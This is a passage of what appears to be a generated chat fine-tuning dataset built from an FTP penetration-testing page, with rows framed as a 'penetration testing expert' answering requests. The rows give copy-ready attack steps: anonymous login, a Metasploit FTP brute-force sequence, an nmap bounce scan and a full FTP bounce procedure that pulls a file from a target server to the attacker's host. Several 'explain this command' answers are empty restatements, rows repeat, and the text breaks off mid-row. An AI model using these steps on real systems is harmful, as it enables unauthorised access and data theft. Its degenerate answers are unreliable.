(yes, they could be hidden)\nftp> ...\n``", "metadata": {"corpus_index": 1493, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the ftp syntax for 🛠️ ftp - anonymous login?"}, {"role": "assistant", "content": "$ ftp $IP $PORT\nName: anonymous\nPassword: \nftp> ls -a # List all files (even hidden) (yes, they could be hidden)\nftp> ..."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the ftp syntax for 🛠️ ftp - anonymous login?", "response": "$ ftp $IP $PORT\nName: anonymous\nPassword: \nftp> ls -a # List all files (even hidden) (yes, they could be hidden)\nftp> ...", "metadata": {"corpus_index": 1494, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ftp"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ FTP - Anonymous login"}, {"role": "assistant", "content": "$ ftp $IP $PORT\nName: anonymous\nPassword: \nftp> ls -a # List all files (even hidden) (yes, they could be hidden)\nftp> ..."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ FTP - Anonymous login", "response": "$ ftp $IP $PORT\nName: anonymous\nPassword: \nftp> ls -a # List all files (even hidden) (yes, they could be hidden)\nftp> ...", "metadata": {"corpus_index": 1494, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `$ ftp $IP $PORT`?"}, {"role": "assistant", "content": "This command is used for 🛠️ ftp - anonymous login. Anonymous login"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `$ ftp $IP $PORT`?", "response": "This command is used for 🛠️ ftp - anonymous login. Anonymous login", "metadata": {"corpus_index": 1494, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 🛠️ FTP - Brute force in the context of penetration testing"}, {"role": "assistant", "content": "``bash\nmsfconsole\nuse auxiliary/scanner/ftp/ftp_login\nset RHOSTS $IP\nset RPORT $PORT\nset USER_FILE $user.txt\nset PASS_FILE $pass.txt\nrun\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 🛠️ FTP - Brute force in the context of penetration testing", "response": "``bash\nmsfconsole\nuse auxiliary/scanner/ftp/ftp_login\nset RHOSTS $IP\nset RPORT $PORT\nset USER_FILE $user.txt\nset PASS_FILE $pass.txt\nrun\n``", "metadata": {"corpus_index": 1495, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ FTP - Brute force?"}, {"role": "assistant", "content": "``bash\nmsfconsole\nuse auxiliary/scanner/ftp/ftp_login\nset RHOSTS $IP\nset RPORT $PORT\nset USER_FILE $user.txt\nset PASS_FILE $pass.txt\nrun\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ FTP - Brute force?", "response": "``bash\nmsfconsole\nuse auxiliary/scanner/ftp/ftp_login\nset RHOSTS $IP\nset RPORT $PORT\nset USER_FILE $user.txt\nset PASS_FILE $pass.txt\nrun\n``", "metadata": {"corpus_index": 1495, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the msfconsole syntax for 🛠️ ftp - brute force?"}, {"role": "assistant", "content": "msfconsole\nuse auxiliary/scanner/ftp/ftp_login\nset RHOSTS $IP\nset RPORT $PORT\nset USER_FILE $user.txt\nset PASS_FILE $pass.txt\nrun"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the msfconsole syntax for 🛠️ ftp - brute force?", "response": "msfconsole\nuse auxiliary/scanner/ftp/ftp_login\nset RHOSTS $IP\nset RPORT $PORT\nset USER_FILE $user.txt\nset PASS_FILE $pass.txt\nrun", "metadata": {"corpus_index": 1496, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "msfconsole"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ FTP - Brute force"}, {"role": "assistant", "content": "msfconsole\nuse auxiliary/scanner/ftp/ftp_login\nset RHOSTS $IP\nset RPORT $PORT\nset USER_FILE $user.txt\nset PASS_FILE $pass.txt\nrun"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ FTP - Brute force", "response": "msfconsole\nuse auxiliary/scanner/ftp/ftp_login\nset RHOSTS $IP\nset RPORT $PORT\nset USER_FILE $user.txt\nset PASS_FILE $pass.txt\nrun", "metadata": {"corpus_index": 1496, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `msfconsole`?"}, {"role": "assistant", "content": "This command is used for 🛠️ ftp - brute force. Brute force"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `msfconsole`?", "response": "This command is used for 🛠️ ftp - brute force. Brute force", "metadata": {"corpus_index": 1496, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain 🛠️ FTP - FTP sniffing"}, {"role": "assistant", "content": "If the FTP communications are not encrypted and if the attacker is on the same network of the client or the server he can sniff the data packet traveling between the client and the server in order to retrieve credential.\n\nSeveral tools like Wireshark could be used to sniff TCP packets."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain 🛠️ FTP - FTP sniffing", "response": "If the FTP communications are not encrypted and if the attacker is on the same network of the client or the server he can sniff the data packet traveling between the client and the server in order to retrieve credential.\n\nSeveral tools like Wireshark could be used to sniff TCP packets.", "metadata": {"corpus_index": 1497, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ FTP - FTP sniffing"}, {"role": "assistant", "content": "If the FTP communications are not encrypted and if the attacker is on the same network of the client or the server he can sniff the data packet traveling between the client and the server in order to retrieve credential.\n\nSeveral tools like Wireshark could be used to sniff TCP packets."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ FTP - FTP sniffing", "response": "If the FTP communications are not encrypted and if the attacker is on the same network of the client or the server he can sniff the data packet traveling between the client and the server in order to retrieve credential.\n\nSeveral tools like Wireshark could be used to sniff TCP packets.", "metadata": {"corpus_index": 1497, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 🛠️ FTP - FTP Bounce attacks?"}, {"role": "assistant", "content": "FTP Bounce attacks let an attacker requests access to ports by using the FTP command PORT. It's mostly used to make a port-scan without being detected (as you are not the one doing it, but the FTP server for you), for D.o.S. attacks, or to download files from another FTP server.\n\nTo check if the FTP server is vulnerable to Bounce attacks it is possible to use the tool NMAP.\n\n> [!TIP]\n> https://nmap.org/nsedoc/scripts/ftp-bounce.html"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 🛠️ FTP - FTP Bounce attacks?", "response": "FTP Bounce attacks let an attacker requests access to ports by using the FTP command PORT. It's mostly used to make a port-scan without being detected (as you are not the one doing it, but the FTP server for you), for D.o.S. attacks, or to download files from another FTP server.\n\nTo check if the FTP server is vulnerable to Bounce attacks it is possible to use the tool NMAP.\n\n> [!TIP]\n> https://nmap.org/nsedoc/scripts/ftp-bounce.html", "metadata": {"corpus_index": 1498, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ FTP - FTP Bounce attacks?"}, {"role": "assistant", "content": "FTP Bounce attacks let an attacker requests access to ports by using the FTP command PORT. It's mostly used to make a port-scan without being detected (as you are not the one doing it, but the FTP server for you), for D.o.S. attacks, or to download files from another FTP server.\n\nTo check if the FTP server is vulnerable to Bounce attacks it is possible to use the tool NMAP.\n\n> [!TIP]\n> https://nmap.org/nsedoc/scripts/ftp-bounce.html"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ FTP - FTP Bounce attacks?", "response": "FTP Bounce attacks let an attacker requests access to ports by using the FTP command PORT. It's mostly used to make a port-scan without being detected (as you are not the one doing it, but the FTP server for you), for D.o.S. attacks, or to download files from another FTP server.\n\nTo check if the FTP server is vulnerable to Bounce attacks it is possible to use the tool NMAP.\n\n> [!TIP]\n> https://nmap.org/nsedoc/scripts/ftp-bounce.html", "metadata": {"corpus_index": 1498, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ FTP - Scan the victim's network work?"}, {"role": "assistant", "content": "If a FTP server is vulnerable to Bounce attacks, an attacker could use it to scan its network without being detected.\n\n``bash\nnmap -v -b -P0 'username':'password'@'ftp_server' 'address(es)_to_scan'\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ FTP - Scan the victim's network work?", "response": "If a FTP server is vulnerable to Bounce attacks, an attacker could use it to scan its network without being detected.\n\n``bash\nnmap -v -b -P0 'username':'password'@'ftp_server' 'address(es)_to_scan'\n``", "metadata": {"corpus_index": 1499, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ FTP - Scan the victim's network?"}, {"role": "assistant", "content": "If a FTP server is vulnerable to Bounce attacks, an attacker could use it to scan its network without being detected.\n\n``bash\nnmap -v -b -P0 'username':'password'@'ftp_server' 'address(es)_to_scan'\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ FTP - Scan the victim's network?", "response": "If a FTP server is vulnerable to Bounce attacks, an attacker could use it to scan its network without being detected.\n\n``bash\nnmap -v -b -P0 'username':'password'@'ftp_server' 'address(es)_to_scan'\n``", "metadata": {"corpus_index": 1499, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the nmap command to 🛠️ ftp - scan the victim's network"}, {"role": "assistant", "content": "nmap -v -b -P0 'username':'password'@'ftp_server' 'address(es)_to_scan'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the nmap command to 🛠️ ftp - scan the victim's network", "response": "nmap -v -b -P0 'username':'password'@'ftp_server' 'address(es)_to_scan'", "metadata": {"corpus_index": 1500, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "nmap"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ FTP - Scan the victim's network"}, {"role": "assistant", "content": "nmap -v -b -P0 'username':'password'@'ftp_server' 'address(es)_to_scan'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ FTP - Scan the victim's network", "response": "nmap -v -b -P0 'username':'password'@'ftp_server' 'address(es)_to_scan'", "metadata": {"corpus_index": 1500, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `nmap -v -b -P0 'username':'password'@'ftp_server' 'address(es)_to_scan'`?"}, {"role": "assistant", "content": "This command is used for 🛠️ ftp - scan the victim's network. Scan the victim's network"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `nmap -v -b -P0 'username':'password'@'ftp_server' 'address(es)_to_scan'`?", "response": "This command is used for 🛠️ ftp - scan the victim's network. Scan the victim's network", "metadata": {"corpus_index": 1500, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ FTP - Download file/folder?"}, {"role": "assistant", "content": "If an attacker has access to a bounce FTP server, he can make it request files of other FTP server and download that file to his own server.\n\n> [!CAUTION]\n> Requirements:\n> \n> * Valid credentials in the FTP intermediate server\n> * Valid credentials in target FTP server\n> * Both servers accept the PORT command\n> * Write permissions in the intermediate server\n> * Attacker's FTP server supports passive mode"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ FTP - Download file/folder?", "response": "If an attacker has access to a bounce FTP server, he can make it request files of other FTP server and download that file to his own server.\n\n> [!CAUTION]\n> Requirements:\n> \n> * Valid credentials in the FTP intermediate server\n> * Valid credentials in target FTP server\n> * Both servers accept the PORT command\n> * Write permissions in the intermediate server\n> * Attacker's FTP server supports passive mode", "metadata": {"corpus_index": 1501, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ FTP - Download file/folder?"}, {"role": "assistant", "content": "If an attacker has access to a bounce FTP server, he can make it request files of other FTP server and download that file to his own server.\n\n> [!CAUTION]\n> Requirements:\n> \n> * Valid credentials in the FTP intermediate server\n> * Valid credentials in target FTP server\n> * Both servers accept the PORT command\n> * Write permissions in the intermediate server\n> * Attacker's FTP server supports passive mode"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ FTP - Download file/folder?", "response": "If an attacker has access to a bounce FTP server, he can make it request files of other FTP server and download that file to his own server.\n\n> [!CAUTION]\n> Requirements:\n> \n> * Valid credentials in the FTP intermediate server\n> * Valid credentials in target FTP server\n> * Both servers accept the PORT command\n> * Write permissions in the intermediate server\n> * Attacker's FTP server supports passive mode", "metadata": {"corpus_index": 1501, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ FTP - Steps?"}, {"role": "assistant", "content": "* Connect to your own FTP server and make the connection passive to make it listen in a directory where the victim service will send the file.\n\n``bash\n#Start server + connection\nservice pure-ftpd start\nftp My_IP 21\nftp> USER my_own_username\n#Enable passive mode\nftp> pasv\nEntering Passive Mode (F,F,F,F,X,X) #Note the output (IP and port)\n#Tells server to accept data and to store it into the dump file\nftp> stor dump\n`\n\n* Create the file to send to the intermediate server with the commands that the targeted server will have to execute. Let's call this file instrs.\n\n`bash\nuser ftp # user and pass of the targeted server\npass -anonymous@\ncwd /DIRECTORY\ntype i\nport F,F,F,F,X,X #IP and port of the attacker\nretr file.tar.Z\nquit\n^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@\n^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@\n...\n`\n\n> [!TIP]\n> The extra nulls at the end of the command file are to fill up the TCP windows and ensure that the command connection stays open long enough for the whole session to be executed.\n\n* Upload this file on the intermediate server, then upload it from the intermediate server to the targeted server and __make the targeted machine execute this file. \n\n`bash\n#Run these commands on the intermediate server\nput instrs\nquote \"port C,C,C,C,0,21\" #IP of the targeted server\nquote \"retr instrs\"\n``\n\n* The attacker should have received on his server the file 'file.tar.Z' renamed as 'dump'."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ FTP - Steps?", "response": "* Connect to your own FTP server and make the connection passive to make it listen in a directory where the victim service will send the file.\n\n``bash\n#Start server + connection\nservice pure-ftpd start\nftp My_IP 21\nftp> USER my_own_username\n#Enable passive mode\nftp> pasv\nEntering Passive Mode (F,F,F,F,X,X) #Note the output (IP and port)\n#Tells server to accept data and to store it into the dump file\nftp> stor dump\n`\n\n* Create the file to send to the intermediate server with the commands that the targeted server will have to execute. Let's call this file instrs.\n\n`bash\nuser ftp # user and pass of the targeted server\npass -anonymous@\ncwd /DIRECTORY\ntype i\nport F,F,F,F,X,X #IP and port of the attacker\nretr file.tar.Z\nquit\n^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@\n^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@\n...\n`\n\n> [!TIP]\n> The extra nulls at the end of the command file are to fill up the TCP windows and ensure that the command connection stays open long enough for the whole session to be executed.\n\n* Upload this file on the intermediate server, then upload it from the intermediate server to the targeted server and __make the targeted machine execute this file. \n\n`bash\n#Run these commands on the intermediate server\nput instrs\nquote \"port C,C,C,C,0,21\" #IP of the targeted server\nquote \"retr instrs\"\n``\n\n* The attacker should have received on his server the file 'file.tar.Z' renamed as 'dump'.", "metadata": {"corpus_index": 1502, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ FTP - Steps"}, {"role": "assistant", "content": "* Connect to your own FTP server and make the connection passive to make it listen in a directory where the victim service will send the file.\n\n``bash\n#Start server + connection\nservice pure-ftpd start\nftp My_IP 21\nftp> USER my_own_username\n#Enable passive mode\nftp> pasv\nEntering Passive Mode (F,F,F,F,X,X) #Note the output (IP and port)\n#Tells server to accept data and to store it into the dump file\nftp> stor dump\n`\n\n* Create the file to send to the intermediate server with the commands that the targeted server will have to execute. Let's call this file instrs.\n\n`bash\nuser ftp # user and pass of the targeted server\npass -anonymous@\ncwd /DIRECTORY\ntype i\nport F,F,F,F,X,X #IP and port of the attacker\nretr file.tar.Z\nquit\n^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@\n^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@\n...\n`\n\n> [!TIP]\n> The extra nulls at the end of the command file are to fill up the TCP windows and ensure that the command connection stays open long enough for the whole session to be executed.\n\n* Upload this file on the intermediate server, then upload it from the intermediate server to the targeted server and __make the targeted machine execute this file. \n\n`bash\n#Run these commands on the intermediate server\nput instrs\nquote \"port C,C,C,C,0,21\" #IP of the targeted server\nquote \"retr instrs\"\n``\n\n* The attacker should have received on his server the file 'file.tar.Z' renamed as 'dump'."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ FTP - Steps", "response": "* Connect to your own FTP server and make the connection passive to make it listen in a directory where the victim service will send the file.\n\n``bash\n#Start server + connection\nservice pure-ftpd start\nftp My_IP 21\nftp> USER my_own_username\n#Enable passive mode\nftp> pasv\nEntering Passive Mode (F,F,F,F,X,X) #Note the output (IP and port)\n#Tells server to accept data and to store it into the dump file\nftp> stor dump\n`\n\n* Create the file to send to the intermediate server with the commands that the targeted server will have to execute. Let's call this file instrs.\n\n`bash\nuser ftp # user and pass of the targeted server\npass -anonymous@\ncwd /DIRECTORY\ntype i\nport F,F,F,F,X,X #IP and port of the attacker\nretr file.tar.Z\nquit\n^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@\n^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@\n...\n`\n\n> [!TIP]\n> The extra nulls at the end of the command file are to fill up the TCP windows and ensure that the command connection stays open long enough for the whole session to be executed.\n\n* Upload this file on the intermediate server, then upload it from the intermediate server to the targeted server and __make the targeted machine execute this file. \n\n`bash\n#Run these commands on the intermediate server\nput instrs\nquote \"port C,C,C,C,0,21\" #IP of the targeted server\nquote \"retr instrs\"\n``\n\n* The attacker should have received on his server the file 'file.tar.Z' renamed as 'dump'.", "metadata": {"corpus_index": 1502, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Start command to 🛠️ ftp - steps"}, {"role": "assistant", "content": "#Start server + connection\nservice pure-ftpd start\nftp My_IP 21\nftp> USER my_own_username\n#Enable passive mode\nftp> pasv\nEntering Passive Mode (F,F,F,F,X,X) #Note the output (IP and port)\n#Tells server to accept data and to store it into the dump file\nftp> stor dump"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Start command to 🛠️ ftp - steps", "response": "#Start server + connection\nservice pure-ftpd start\nftp My_IP 21\nftp> USER my_own_username\n#Enable passive mode\nftp> pasv\nEntering Passive Mode (F,F,F,F,X,X) #Note the output (IP and port)\n#Tells server to accept data and to store it into the dump file\nftp> stor dump", "metadata": {"corpus_index": 1503, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Start"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ FTP - Steps?"}, {"role": "assistant", "content": "#Start server + connection\nservice pure-ftpd start\nftp My_IP 21\nftp> USER my_own_username\n#Enable passive mode\nftp> pasv\nEntering Passive Mode (F,F,F,F,X,X) #Note the output (IP and port)\n#Tells server to accept data and to store it into the dump file\nftp> stor dump"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ FTP - Steps?", "response": "#Start server + connection\nservice pure-ftpd start\nftp My_IP 21\nftp> USER my_own_username\n#Enable passive mode\nftp> pasv\nEntering Passive Mode (F,F,F,F,X,X) #Note the output (IP and port)\n#Tells server to accept data and to store it into the dump file\nftp> stor dump", "metadata": {"corpus_index": 1503, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the user command to 🛠️ ftp - steps"}, {"role": "assistant", "content": "user ftp # user and pass of the targeted server\npass -anonymous@\ncwd /DIRECTORY\ntype i\nport F,F,F,F,X,X #IP and port of the attacker\nretr file.tar.Z\nquit\n^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@\n^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@\n..."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the user command to 🛠️ ftp - steps", "response": "user ftp # user and pass of the targeted server\npass -anonymous@\ncwd /DIRECTORY\ntype i\nport F,F,F,F,X,X #IP and port of the attacker\nretr file.tar.Z\nquit\n^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... 